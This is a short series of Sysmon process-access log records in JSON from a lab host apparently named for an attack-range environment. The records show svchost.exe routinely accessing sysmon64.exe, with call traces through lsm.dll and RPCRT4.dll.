{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8347,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8348,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8349,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8350,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8351,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8352,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8353,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8354,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
